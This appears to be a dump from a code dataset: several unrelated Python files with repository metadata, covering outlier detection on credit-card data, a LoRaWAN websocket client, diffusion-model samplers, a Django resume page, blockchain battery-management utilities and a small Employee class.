| devabsaitov/self_study | sqlalchemy_lesson/Basic/7_using_aliases.py | 7_using_aliases.py | py | 494 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.MetaData",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Table",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sqlalchemy... |
2926954909 | import pandas as pd
import numpy as np
from multiprocessing.pool import ThreadPool
from multiprocessing import cpu_count
import operator
from collections import OrderedDict
import itertools
import time
from sklearn.metrics import accuracy_score
import visualization
visuals = visualization.Visualization()
class Local_Outlier_Factor:
'''
@Author: Naren Surampudi
'''
def __init__(self):
self.K = 2
self.DATA = None
self.SAMPLE_DATA = None
self.DATA_FLAG = True
self.THRESH = 1
self.REDUCED_POINTS = []
def neighborhood(self):
if self.DATA_FLAG:
val_data = self.DATA.values.tolist()
else:
val_data = self.SAMPLE_DATA # for sample sets
lrds = []
reach_distances = []
read_index1 = 0
neighbors_dict = {}
reduced_points = []
for reading1 in val_data:
self.REDUCED_POINTS.append(visuals.dimension_reduction(reading1))
neighbors = {}
neighbors_dict[read_index1] = []
read_index2 = 0
for reading2 in val_data:
if read_index1 != read_index2:
print("Reading indices: " + str(read_index1) + " " + str(read_index2))
distance = sum(abs(np.array(list(reading1)) - np.array(list(reading2))))
distance = round(distance, ndigits=2)
neighbors[read_index2] = distance
read_index2 = read_index2 + 1
sorted_temp = sorted(neighbors.items(), key=lambda kv: kv[1])
neighbors = OrderedDict(sorted_temp)
neighbors = list(itertools.islice(neighbors.items(), 0, self.K))
# print(neighbors)
for n in neighbors:
neighbors_dict[read_index1].append(n)
lrds.append(self.LRD(neighbors, self.K))
read_index1 = read_index1 + 1
return [lrds, neighbors_dict]
def K_element_dist(self, read_index1, K):
if self.DATA_FLAG:
val_data = self.DATA.values.tolist()
else:
val_data = self.SAMPLE_DATA
k_dists = []
reading1 = val_data[read_index1]
read_index2 = 0
for reading2 in val_data:
if read_index1 != read_index2:
distance = sum(abs(np.array(list(reading1)) - np.array(list(reading2))))
distance = round(distance, ndigits=2)
k_dists.append(distance)
read_index2 = read_index2 + 1
k_dists.sort()
k_dists = k_dists[0:self.K]
# print(k_dists)
return k_dists[-1]
def LRD(self, neighbors, K):
k_nearest_count = len(neighbors)
reach_distance_sum = self.reach_distance(neighbors, self.K)
lrd = k_nearest_count / reach_distance_sum
return lrd
def reach_distance(self, neighbors, K):
rds = []
for element in neighbors:
rd = max(self.K_element_dist(element[0], self.K), element[1])
rds.append(rd)
return sum(rds)
def LOF(self, lrds, neighbors_dict, K):
lofs = []
# print(neighbors_dict)
for element in neighbors_dict.keys():
print("Calculating LOF for: " + str(element))
neighbors = neighbors_dict[element]
lrd_sum = 0
reach_dist_sum = self.reach_distance(neighbors, self.K)
for n in neighbors:
lrd_sum = lrd_sum + lrds[n[0]]
# reach_dist_sum = reach_dist_sum + reach_distances[n]
lof = (lrd_sum * reach_dist_sum) / (self.K**2)
lof = round(lof, ndigits=2)
# specific for fraud detection
if lof > self.THRESH:
lof = 1
visuals.OUTLIERS.append(self.REDUCED_POINTS[element])
else:
lof = 0
visuals.NON_OUTLIERS.append(self.REDUCED_POINTS[element])
lofs.append(lof)
return lofs
def container(self):
lof_reqs = self.neighborhood()
lofs = self.LOF(lof_reqs[0], lof_reqs[1], self.K)
return lofs
if __name__ == "__main__":
lof_class = Local_Outlier_Factor()
credit_data = pd.read_csv('../creditcard_nomralized.csv')
y = credit_data['Class']
req_cols = []
for i in range(1, 29):
req_cols.append('V' + str(i))
req_cols.append('Time')
req_cols.append('Amount')
data = credit_data[req_cols]
sample_data = [[0,0],[0,1],[1,1],[3,0]] # some sample data
lof_class.DATA = data[0:10000]
lof_class.SAMPLE_DATA = sample_data
lof_class.DATA_FLAG = False
if lof_class.DATA_FLAG:
lof_class.K = 20
lof_class.THRESH = 1.5
val_y = y[0:10000]
pool = ThreadPool(processes=cpu_count())
# lof_reqs = (pool.apply_async(lof_class.neighborhood)).get()
# print(type(neighbors))
# print(data.values.tolist()[0])
# lofs = lof_class.LOF(lof_reqs[0], lof_reqs[1], lof_class.K)
start_time = time.clock()
lofs = (pool.apply_async(lof_class.container)).get()
stop_time = time.clock()
run_time = stop_time - start_time
# print(lofs)
if lof_class.DATA_FLAG:
print("Accuracy: " + str(accuracy_score(lofs, val_y)))
print("Time: " + str(run_time))
visuals.outlier_plot()
| aditya-srikanth/Data-Mining-Assignment-3 | LOF.py | LOF.py | py | 5,514 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "visualization.Visualization",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "collections.OrderedDict",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "itert... |
20101978227 | import cache
import timer
import lora
import websockets
import asyncio
import threading
import keyboard
import timestamp
def thread_function():
while (not cache.stop_thread):
timer.countdown(cache.t)
def thread_function_killer():
while (not cache.stop_thread):
record = keyboard.record(until = 'q')
record = str(record[0])
if record == "KeyboardEvent(q down)" or record == "KeyboardEvent(q up)":
print('\nYou terminated the program!\nGoodbye\n.')
cache.stop_thread = True
break
def thread_function_bdreg():
while (not cache.stop_thread):
if cache.time_thread == True:
time = timestamp.timestamp()
cache_len = len(cache.cache)
if cache_len > 0:
print("\n[CACHE FLUSH]")
lora.cacheClear(time)
else:
print("\n[CACHE FLUSH EMPTY]")
cache.marcos_fluxos.append(time)
cache.numero_fluxos += 1
cache.time_thread = False
#if cache.expire_thread == True:
# time = timestamp.timestamp()
# cache_len = len(cache.cache)
# if cache_len > 0:
# lora.reg_expire(time)
# cache.expire_thread = False
if len(cache.cache) >= cache.cache_max_size :
time = timestamp.timestamp()
cache_len = len(cache.cache)
if cache_len > 0:
print("\n[CACHE SIZE FLUSH]")
lora.cacheClear(time)
print("\n[CACHE SIZE FLUSH EMPTY]")
cache.marcos_fluxos.append(time)
cache.numero_fluxos += 1
return
def main():
x = threading.Thread(target=thread_function)
#y = threading.Thread(target=thread_function_killer)
z = threading.Thread(target = thread_function_bdreg)
#y.start()
z.start()
x.start()
#Define uma função assíncrona que se conecta ao seridor e lida com as informações que chegam.
async def listen():
#Conecta ao servidor.
async with websockets.connect(cache.url, ping_interval=None) as ws:
await ws.send("") #conexão de testes
#Faz com que a execução seja contínua e que se escute todas as mensagens que chegam.
while (not cache.stop_thread):
print("Listening")
if cache.stop_thread == True:
return
msg = await ws.recv()
#Verifica se é uma mensagem de erro. Caso não seja, criar fluxo e armazena na cache.
fluxo = lora.createFlow(msg)
if fluxo != None:
cache.cache.append(fluxo)
print("\nFLOW UPDATED TO CACHE:\n---------------------------")
print(f"\n Último fluxo em: {cache.marcos_fluxos} | Fluxos registrados: {cache.numero_fluxos} | Mensagens totais: {cache.numero_mensagens}\n")
#It will run the function "listen()" and it will wait until it is completed.
#We need a connection wich is asyn, and we need a received message wich is also async.
asyncio.get_event_loop().run_until_complete(listen())
if __name__ == "__main__":
main() | juliogcm/lorawan-flow | websocket_client/client.py | client.py | py | 3,331 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cache.stop_thread",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "timer.countdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cache.t",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cache.stop_thread... |
22565647008 | import numpy as np
import torch as th
from .gaussian_diffusion import GaussianDiffusion, mean_flat
class KarrasDenoiser:
def __init__(self, sigma_data: float = 0.5):
self.sigma_data = sigma_data
def get_snr(self, sigmas):
return sigmas**-2
def get_sigmas(self, sigmas):
return sigmas
def get_scalings(self, sigma):
c_skip = self.sigma_data**2 / (sigma**2 + self.sigma_data**2)
c_out = sigma * self.sigma_data / (sigma**2 + self.sigma_data**2) ** 0.5
c_in = 1 / (sigma**2 + self.sigma_data**2) ** 0.5
return c_skip, c_out, c_in
def training_losses(self, model, x_start, sigmas, model_kwargs=None, noise=None):
if model_kwargs is None:
model_kwargs = {}
if noise is None:
noise = th.randn_like(x_start)
terms = {}
dims = x_start.ndim
x_t = x_start + noise * append_dims(sigmas, dims)
c_skip, c_out, _ = [append_dims(x, dims) for x in self.get_scalings(sigmas)]
model_output, denoised = self.denoise(model, x_t, sigmas, **model_kwargs)
target = (x_start - c_skip * x_t) / c_out
terms["mse"] = mean_flat((model_output - target) ** 2)
terms["xs_mse"] = mean_flat((denoised - x_start) ** 2)
if "vb" in terms:
terms["loss"] = terms["mse"] + terms["vb"]
else:
terms["loss"] = terms["mse"]
return terms
def denoise(self, model, x_t, sigmas, **model_kwargs):
c_skip, c_out, c_in = [append_dims(x, x_t.ndim) for x in self.get_scalings(sigmas)]
rescaled_t = 1000 * 0.25 * th.log(sigmas + 1e-44)
model_output = model(c_in * x_t, rescaled_t, **model_kwargs)
denoised = c_out * model_output + c_skip * x_t
return model_output, denoised
class GaussianToKarrasDenoiser:
def __init__(self, model, diffusion):
from scipy import interpolate
self.model = model
self.diffusion = diffusion
self.alpha_cumprod_to_t = interpolate.interp1d(
diffusion.alphas_cumprod, np.arange(0, diffusion.num_timesteps)
)
def sigma_to_t(self, sigma):
alpha_cumprod = 1.0 / (sigma**2 + 1)
if alpha_cumprod > self.diffusion.alphas_cumprod[0]:
return 0
elif alpha_cumprod <= self.diffusion.alphas_cumprod[-1]:
return self.diffusion.num_timesteps - 1
else:
return float(self.alpha_cumprod_to_t(alpha_cumprod))
def denoise(self, x_t, sigmas, clip_denoised=True, model_kwargs=None):
t = th.tensor(
[self.sigma_to_t(sigma) for sigma in sigmas.cpu().numpy()],
dtype=th.long,
device=sigmas.device,
)
c_in = append_dims(1.0 / (sigmas**2 + 1) ** 0.5, x_t.ndim)
out = self.diffusion.p_mean_variance(
self.model, x_t * c_in, t, clip_denoised=clip_denoised, model_kwargs=model_kwargs
)
return None, out["pred_xstart"]
def karras_sample(*args, **kwargs):
last = None
for x in karras_sample_progressive(*args, **kwargs):
last = x["x"]
return last
def karras_sample_progressive(
diffusion,
model,
shape,
steps,
clip_denoised=True,
progress=False,
model_kwargs=None,
device=None,
sigma_min=0.002,
sigma_max=80, # higher for highres?
rho=7.0,
sampler="heun",
s_churn=0.0,
s_tmin=0.0,
s_tmax=float("inf"),
s_noise=1.0,
guidance_scale=0.0,
):
sigmas = get_sigmas_karras(steps, sigma_min, sigma_max, rho, device=device)
x_T = th.randn(*shape, device=device) * sigma_max
sample_fn = {"heun": sample_heun, "dpm": sample_dpm, "ancestral": sample_euler_ancestral}[
sampler
]
if sampler != "ancestral":
sampler_args = dict(s_churn=s_churn, s_tmin=s_tmin, s_tmax=s_tmax, s_noise=s_noise)
else:
sampler_args = {}
if isinstance(diffusion, KarrasDenoiser):
def denoiser(x_t, sigma):
_, denoised = diffusion.denoise(model, x_t, sigma, **model_kwargs)
if clip_denoised:
denoised = denoised.clamp(-1, 1)
return denoised
elif isinstance(diffusion, GaussianDiffusion):
model = GaussianToKarrasDenoiser(model, diffusion)
def denoiser(x_t, sigma):
_, denoised = model.denoise(
x_t, sigma, clip_denoised=clip_denoised, model_kwargs=model_kwargs
)
return denoised
else:
raise NotImplementedError
if guidance_scale != 0 and guidance_scale != 1:
def guided_denoiser(x_t, sigma):
x_t = th.cat([x_t, x_t], dim=0)
sigma = th.cat([sigma, sigma], dim=0)
x_0 = denoiser(x_t, sigma)
cond_x_0, uncond_x_0 = th.split(x_0, len(x_0) // 2, dim=0)
x_0 = uncond_x_0 + guidance_scale * (cond_x_0 - uncond_x_0)
return x_0
else:
guided_denoiser = denoiser
for obj in sample_fn(
guided_denoiser,
x_T,
sigmas,
progress=progress,
**sampler_args,
):
if isinstance(diffusion, GaussianDiffusion):
yield diffusion.unscale_out_dict(obj)
else:
yield obj
def get_sigmas_karras(n, sigma_min, sigma_max, rho=7.0, device="cpu"):
"""Constructs the noise schedule of Karras et al. (2022)."""
ramp = th.linspace(0, 1, n)
min_inv_rho = sigma_min ** (1 / rho)
max_inv_rho = sigma_max ** (1 / rho)
sigmas = (max_inv_rho + ramp * (min_inv_rho - max_inv_rho)) ** rho
return append_zero(sigmas).to(device)
def to_d(x, sigma, denoised):
"""Converts a denoiser output to a Karras ODE derivative."""
return (x - denoised) / append_dims(sigma, x.ndim)
def get_ancestral_step(sigma_from, sigma_to):
"""Calculates the noise level (sigma_down) to step down to and the amount
of noise to add (sigma_up) when doing an ancestral sampling step."""
sigma_up = (sigma_to**2 * (sigma_from**2 - sigma_to**2) / sigma_from**2) ** 0.5
sigma_down = (sigma_to**2 - sigma_up**2) ** 0.5
return sigma_down, sigma_up
@th.no_grad()
def sample_euler_ancestral(model, x, sigmas, progress=False):
"""Ancestral sampling with Euler method steps."""
s_in = x.new_ones([x.shape[0]])
indices = range(len(sigmas) - 1)
if progress:
from tqdm.auto import tqdm
indices = tqdm(indices)
for i in indices:
denoised = model(x, sigmas[i] * s_in)
sigma_down, sigma_up = get_ancestral_step(sigmas[i], sigmas[i + 1])
yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigmas[i], "pred_xstart": denoised}
d = to_d(x, sigmas[i], denoised)
# Euler method
dt = sigma_down - sigmas[i]
x = x + d * dt
x = x + th.randn_like(x) * sigma_up
yield {"x": x, "pred_xstart": x}
@th.no_grad()
def sample_heun(
denoiser,
x,
sigmas,
progress=False,
s_churn=0.0,
s_tmin=0.0,
s_tmax=float("inf"),
s_noise=1.0,
):
"""Implements Algorithm 2 (Heun steps) from Karras et al. (2022)."""
s_in = x.new_ones([x.shape[0]])
indices = range(len(sigmas) - 1)
if progress:
from tqdm.auto import tqdm
indices = tqdm(indices)
for i in indices:
gamma = (
min(s_churn / (len(sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.0
)
eps = th.randn_like(x) * s_noise
sigma_hat = sigmas[i] * (gamma + 1)
if gamma > 0:
x = x + eps * (sigma_hat**2 - sigmas[i] ** 2) ** 0.5
denoised = denoiser(x, sigma_hat * s_in)
d = to_d(x, sigma_hat, denoised)
yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigma_hat, "pred_xstart": denoised}
dt = sigmas[i + 1] - sigma_hat
if sigmas[i + 1] == 0:
# Euler method
x = x + d * dt
else:
# Heun's method
x_2 = x + d * dt
denoised_2 = denoiser(x_2, sigmas[i + 1] * s_in)
d_2 = to_d(x_2, sigmas[i + 1], denoised_2)
d_prime = (d + d_2) / 2
x = x + d_prime * dt
yield {"x": x, "pred_xstart": denoised}
@th.no_grad()
def sample_dpm(
denoiser,
x,
sigmas,
progress=False,
s_churn=0.0,
s_tmin=0.0,
s_tmax=float("inf"),
s_noise=1.0,
):
"""A sampler inspired by DPM-Solver-2 and Algorithm 2 from Karras et al. (2022)."""
s_in = x.new_ones([x.shape[0]])
indices = range(len(sigmas) - 1)
if progress:
from tqdm.auto import tqdm
indices = tqdm(indices)
for i in indices:
gamma = (
min(s_churn / (len(sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigmas[i] <= s_tmax else 0.0
)
eps = th.randn_like(x) * s_noise
sigma_hat = sigmas[i] * (gamma + 1)
if gamma > 0:
x = x + eps * (sigma_hat**2 - sigmas[i] ** 2) ** 0.5
denoised = denoiser(x, sigma_hat * s_in)
d = to_d(x, sigma_hat, denoised)
yield {"x": x, "i": i, "sigma": sigmas[i], "sigma_hat": sigma_hat, "denoised": denoised}
# Midpoint method, where the midpoint is chosen according to a rho=3 Karras schedule
sigma_mid = ((sigma_hat ** (1 / 3) + sigmas[i + 1] ** (1 / 3)) / 2) ** 3
dt_1 = sigma_mid - sigma_hat
dt_2 = sigmas[i + 1] - sigma_hat
x_2 = x + d * dt_1
denoised_2 = denoiser(x_2, sigma_mid * s_in)
d_2 = to_d(x_2, sigma_mid, denoised_2)
x = x + d_2 * dt_2
yield {"x": x, "pred_xstart": denoised}
def append_dims(x, target_dims):
"""Appends dimensions to the end of a tensor until it has target_dims dimensions."""
dims_to_append = target_dims - x.ndim
if dims_to_append < 0:
raise ValueError(f"input has {x.ndim} dims but target_dims is {target_dims}, which is less")
return x[(...,) + (None,) * dims_to_append]
def append_zero(x):
return th.cat([x, x.new_zeros([1])])
| openai/shap-e | shap_e/diffusion/k_diffusion.py | k_diffusion.py | py | 9,973 | python | en | code | 10,619 | github-code | 36 | [
{
"api_name": "torch.randn_like",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "gaussian_diffusion.mean_flat",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "gaussian_diffusion.mean_flat",
"line_number": 38,
"usage_type": "call"
},
{
"api_na... |
38251884357 | from django.db import models
all_pages = []
# Just switched to keeping it in-memory. No real need for a model here.
# class Page(models.Model):
# top = models.TextField(blank=True, null=True)
# middle_link = models.TextField(blank=True, null=True)
# middle_html = models.TextField(blank=True, null=True)
# bottom = models.TextField(blank=True, null=True)
# year = models.CharField(max_length=200, blank=True, null=True)
# order = models.IntegerField(default=0)
# active = models.BooleanField(default=True)
# def __unicode__(self, *args, **kwargs):
# return self.top
class BaseModel(models.Model):
updated_at = models.DateTimeField(auto_now=True)
class Meta:
abstract = True
def __unicode__(self):
return "%s" % self.name
class SimplePage:
def __init__(self, top="", middle_link="", middle_links=None, bottom="", year=""):
self.top = top
self.middle_link = middle_link # list of dicts - url, text
self.middle_links = middle_links
self.bottom = bottom
self.year = year
def __unicode__(self, *args, **kwargs):
return self.top
def add_page(*args, **kwargs):
globals()["all_pages"].append(SimplePage(*args, **kwargs))
add_page(
top="is enough",
bottom="what does love mean to you?",
middle_link="http://isenough.com",
year="2012 (in-progress)",
)
add_page(
top="encore",
bottom="a digital poem",
middle_link="http://www.encorepoem.com",
year="2012 (in-progress)",
)
add_page(
top="slow art",
bottom="the anti-museum.<br/>\r\nin portland, or",
middle_link="http://slowartpdx.com",
year="2011+",
)
# add_page(
# top="dear text messages,",
# bottom="spoken word",
# middle_link="",
# year="2012",
# )
add_page(
top="togetheralone",
bottom="an experiment in community",
middle_link="http://togetheralone.org",
year="2012 (in-progress)",
)
add_page(
top="the digital executioner",
bottom="viral web idea generator",
middle_link="http://www.thedigitalexecutioner.com",
year="2012",
)
add_page(
top="goodcloud",
bottom="helping small nonprofits succeed",
middle_link="https://www.agoodcloud.com",
year="2011",
)
add_page(
top="github",
bottom="where I keep the bits and bytes",
middle_link = "https://www.github.com/skoczen",
# middle_links=[
# {
# "url": "https://www.github.com/skoczen",
# "text": "Personal",
# "class": ""
# },
# {
# "url": "https://www.github.com/GoodCloud",
# "text": "GoodCloud",
# "class": ""
# }
# ],
year="2009+",
)
add_page(
top="sixlinks",
bottom="sustainability you can actually do",
middle_link="http://www.sixlinks.org",
year="2008+",
)
add_page(
top="the facebooks",
bottom="yep, I'm on there",
middle_link = "https://www.facebook.com/skoczen",
# middle_links=[
# {
# "url": "https://www.facebook.com/skoczen",
# "text": "f",
# "class": "facebook"
# },
# {
# "url": "https://twitter.com/#!/skoczen",
# "text": "t",
# "class": "twitter"
# },
# {
# "url": "https://plus.google.com/101690366177319310091/",
# "text": "g+",
# "class": "google_plus"
# }
# ],
year="2007+",
)
# add_page(
# top="Write Around Portland",
# bottom="I'm proud to be a volunteer and donor for this amazing organization.",
# middle_link="http://www.writearound.org",
# year="2009+",
# )
add_page(
top="30 people, 30 minutes",
bottom="an epic way to turn 30",
middle_link="http://www.30people30minutes.com",
year="1999+",
)
add_page(
top="quantum imagery",
bottom="ye olde sole proprietorship",
middle_link="http://www.quantumimagery.com",
year="1999+",
)
add_page(
top="photoblog",
bottom="ye olde photos",
middle_link="http://www.skoczen.net/photos",
year="2005",
)
add_page(
top="but i'm hungry!",
bottom="ye olde recipe and restaurant site",
middle_link="http://skoczen.net/food/",
year="1999+",
)
add_page(
top="liquid silver zen",
bottom="early experiments in design",
middle_link="http://liquidsilverzen.net/",
year="2002",
)
add_page(
top="or, just google",
bottom="It's all me. Except for the Ohio seatbelt ticket. That's the other Steven Skoczen. (Really.)",
middle_link="https://www.google.com/?q=Steven%20Skoczen",
year="1997+",
)
# add_page(
# top="birth",
# bottom="there was no internet then",
# middle_links=[
# {
# "url": "",
# "text": "whoa",
# "class": ""
# },
# ],
# year="1980",
# )
| skoczen/skoczen | project/apps/resume/models.py | models.py | py | 4,868 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "django.db.models.Model",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "django.db.models.DateTimeField",
"line_number": 20,
"usage_type": "call"
},
{
"api_n... |
34761412830 | import sys, os
import subprocess
import json
from typing import Union
from random import random
import web3
from web3 import Web3
from web3._utils.threads import Timeout
from solcx import compile_files
from eth_utils import decode_hex
# Project modules
from TextColor.color import bcolors
MGMT_CONTRACT_DB_NAME = 'database.json'
MGMT_CONTRACT_SRC_PATH = r"./contracts/ManagementContract.sol"
MGMT_CONTRACT_NAME = "ManagementContract"
BATTERY_MGMT_CONTRACT_SRC_PATH = r"./contracts/BatteryManagement.sol"
BATTERY_MGMT_CONTRACT_NAME = "BatteryManagement"
REGISTRATION_REQUIRED_GAS = 50000
def _deploy_contract_and_wait(_w3: Web3, _actor: str, _contract_src_file: str, _contract_name: str, *args):
"""
Deploy contract to the blockchain and wait it's inclusion to a block
:param str _actor:The person transacting the contract
:param str _contract_src_file: Path to contract source code
:param str _cantract_name: Contract name
:param list args: Contract's function arguments
:return: contract address
:rtype: str
"""
tx_hash = _deploy_contract(_w3, _actor, _contract_src_file, _contract_name, *args)
receipt = web3.eth.wait_for_transaction_receipt(_w3, tx_hash, 120, 0.1)
return receipt["contractAddress"]
def _deploy_contract(_w3: Web3, _actor: str, _contract_src_file: str, _contract_name: str, *args):
"""
Deploy contract to the blockchain
:param Web3 _w3: Web3 instance
:param str _actor: The person transacting the contract
:param str _contract_src_file: Path to contract source code
:param str _cantract_name: Contract name
:param list args: Contract's function arguments
:return: Deployed contract
:rtype: Contract
"""
compiled = compile_contracts(_contract_src_file)
contract = initialize_contract_factory(_w3, compiled, _contract_src_file + ":" + _contract_name)
tx = {'from': _actor, 'gasPrice': get_actual_gas_price(_w3)}
return contract.constructor(*args).transact(transaction=tx)
def _wait_for_validation(_w3: Web3, _tx_dict: dict, _tmout: int = 120) -> dict:
"""
Wait contract's inclusion to a block
:params Web3 _w3: Web3 instance
:params dict _tx_dict: Transactions waiting for inclusion
:params int: _tmout: Timeout for inclusion to a block in seconds
:return: Receipts
:rtype: dict
"""
receipts_list = {}
for i in _tx_dict.keys():
receipts_list[i] = [_tx_dict[i], None]
confirmations = len(list(_tx_dict))
with Timeout(_tmout) as tm:
while(confirmations > 0):
for i in _tx_dict.keys():
if receipts_list[i][1] is None:
tx_reciept = _w3.eth.getTransactionReceipt(receipts_list[i][0])
if tx_reciept is not None:
receipts_list[i][1] = tx_reciept
confirmations -= 1
tm.sleep(random())
return receipts_list
def _create_mgmt_contract_db(_contract_address: str) -> None:
"""
Create json file with Management contract address
:params str _contract_address: Managment contract address in blockchain
:return: Nothing
:rtype: None
"""
data = {'mgmt_contract': _contract_address}
write_data_base(data, MGMT_CONTRACT_DB_NAME)
def get_actual_gas_price(_w3: Web3) -> float:
"""
Get actual gas price
:param Web3 _w3: Web3 instance
:return: Gas price
:rtype: float
"""
return _w3.toWei(1, 'gwei')
def write_data_base(_data: dict, _file_name: str) -> None:
"""
Write dictionary to specific json file
:param dict _data: Data to write
:param str _file_name: Name of the file for writing
:return: Nothing
:rtype: None
"""
with open(_file_name, 'w') as out:
json.dump(_data, out)
def unlock_account(_w3: Web3, _account: str, _password: str) -> None:
"""
Unlock account for transactions
:param Web3 _w3: Web3 instance
:param str _account: Account to unlock
:param str _password: Password for the account
:return: Nothing
:rtype: None
"""
_w3.geth.personal.unlockAccount(_account, _password, 300)
def create_new_account(_w3: Web3, _password: str, _file_name: str) -> str:
"""
Create new account and write it to database
:param Web3 _w3: Web3 instance
:param str _password: Password for the new account
:param str _file_name: Name of the database file for writing
:return: Account address in blockchain
:rtype: str
"""
if os.path.exists(_file_name):
os.remove(_file_name)
account = _w3.geth.personal.newAccount(_password)
data = {"account": account, "password": _password}
write_data_base(data, _file_name)
return f"{bcolors.HEADER}{data['account']}{bcolors.ENDC}"
def open_data_base(_file_name: str) -> Union[dict, None]:
"""
Load data from the database
:param str _file_name: Database file name
:return: None if file does not exist or loaded from the file data
:rtype: None/dict
"""
if os.path.exists(_file_name):
with open(_file_name) as file:
return json.load(file)
else:
return None
def compile_contracts(_files: Union[str, list]):
"""
Compile contract file/files
:param str/list _files: Files to compile
:return: Compiled files
:rtype: dict
"""
if isinstance(_files, str):
contracts = compile_files([_files])
if isinstance(_files, list):
contracts = compile_files(_files)
return contracts
def get_data_from_db(_file_name: str,_key: str) -> Union[str, None]:
"""
Get data from database
:params str _file_name: Name of the database file
:params str _key: Key of dictionary
:return: None if file does not exist or value of dictionary's key
:rtype: None/str
"""
data = open_data_base(_file_name)
if data is None:
print("Cannot access account database")
return None
return data[_key]
def init_management_contract(_w3: Web3):
"""
Creates management contract object
:param Web3 _w3: Web3 instance
:return: Management contract
:rtype: Contract instance
"""
compiled = compile_contracts(MGMT_CONTRACT_SRC_PATH)
mgmt_contract = initialize_contract_factory(_w3, compiled, MGMT_CONTRACT_SRC_PATH + ":" + MGMT_CONTRACT_NAME,
open_data_base(MGMT_CONTRACT_DB_NAME)["mgmt_contract"])
return mgmt_contract
def initialize_contract_factory(_w3: Web3, _compiled_contracts, _key: str, _address: str = None):
"""
Initialize contract
:params Web3 _w3: Web3 instance
:params _compiled_contracts: Compiled contracts
:params str _key: Contract path + name
:params str _address: Target address
:return: Contract instance
:rtype: Contract
"""
if _address is None:
contract = _w3.eth.contract(
abi=_compiled_contracts[_key]['abi'],
bytecode=_compiled_contracts[_key]['bin']
)
else:
contract = _w3.eth.contract(
abi=_compiled_contracts[_key]['abi'],
address=_address
)
return contract
def get_battery_managment_contract_addr(_w3: Web3) -> str:
"""
:params Web3 _w3: Web3 instance
:return: Contract's address
:rtype: str
"""
try:
mgmt_contract = init_management_contract(_w3)
addr = mgmt_contract.functions.getBatteryManagmentAddr().call()
except:
sys.exit(f"{bcolors.FAIL}Failed{bcolors.ENDC}")
return addr
def init_battery_management_contract(_w3: Web3, addr: str):
"""
Creates battery management contract object
:param Web3 _w3: Web3 instance
:param str addr: Battery management contract's address
:return: Battery management contract
:rtype: Contract instance
"""
compiled = compile_contracts(BATTERY_MGMT_CONTRACT_SRC_PATH)
battery_mgmt_contract = initialize_contract_factory(_w3, compiled, BATTERY_MGMT_CONTRACT_SRC_PATH + ":" + BATTERY_MGMT_CONTRACT_NAME,
addr)
return battery_mgmt_contract
def create_script_from_tmpl(private_key, address: str):
with open("batteryTemplate.py", 'r') as tmpl:
lines = tmpl.readlines()
lines[11] = f"private_key = '{private_key}'\n"
with open(f"firmware/{address[2:10]}.py", 'w') as fw:
fw.writelines(lines)
def get_battery_info(_path: str) -> dict:
"""
Get battery info(v, r, s, charges, time)
:param str _path: Path to battery's firmware
:return: Battery's info
:rtype: dict
"""
if os.path.exists(f"{_path}"):
subprocess.run(["python", f"{_path}", "--get"])
else:
sys.exit(f"{bcolors.FAIL}Battery does not exist{bcolors.ENDC}")
return open_data_base(f"{_path[:-3]}_data.json")
def verify_battery(_w3: Web3, _path: str):
"""
Verify battery firmware
:param Web3 _w3: Web3 instance
:param str _path: Path to firmware
:return:
:rtype:
"""
verified = False
battery_info = get_battery_info(_path)
if battery_info is None:
sys.exit(f"{bcolors.FAIL}The battery does not exist{bcolors.ENDC}")
battery_mgmt_addr = get_battery_managment_contract_addr(_w3)
battery_mgmt_contract = init_battery_management_contract(_w3, battery_mgmt_addr)
verified, vendor_address = battery_mgmt_contract.functions.verifyBattery(battery_info['v'], _w3.toBytes(hexstr=battery_info['r']),
_w3.toBytes(hexstr=battery_info['s']), battery_info['charges'],
battery_info['time']).call()
mgmt_contract = init_management_contract(_w3)
vendor_id = _w3.toHex(mgmt_contract.functions.vendorId(vendor_address).call())
vendor_name = (mgmt_contract.functions.vendorNames(vendor_id).call()).decode()
return verified, battery_info['charges'], vendor_id, vendor_name
def change_owner(_w3: Web3, _battery_id: str, _new_owner: str, account_db_name: str) -> str:
"""
Change the owner of battery
:param Web3 _w3: Web3 instance
:param str _battery_id: battery ID
:param str _new_owner: New owner address
:return: Status message
:rtype: str
"""
data = open_data_base(account_db_name)
actor = data['account']
tx = {'from': actor, 'gasPrice': get_actual_gas_price(_w3), 'gas':2204 * 68 + 21000}
battery_mgmt_contract_addr = get_battery_managment_contract_addr(_w3)
battery_mgmt_contract = init_battery_management_contract(_w3, battery_mgmt_contract_addr)
unlock_account(_w3, actor, data['password'])
tx_hash = battery_mgmt_contract.functions.transfer(_new_owner, decode_hex(_battery_id)).transact(tx)
receipt = web3.eth.wait_for_transaction_receipt(_w3, tx_hash, 120, 0.1)
result = receipt.status
if result == 1:
return "Ownership change was successfull"
else:
return "Ownership change failed"
| acid9reen/bas | utils.py | utils.py | py | 11,123 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "web3.Web3",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "web3.eth.wait_for_transaction_receipt",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "web3.eth",
"line_number": 37,
"usage_type": "attribute"
},
{
"api_name": "web3.We... |
34234807737 |
class Employee:
raise_amount = 1.04
num_emps = 0
def __init__(self, first, last, pay):
self.first = first
self.last = last
self.pay = pay
self.email = first + '.' + last + '@company.com'
Employee.num_emps += 1
def fullname(self):
return f"{self.first} {self.last}"
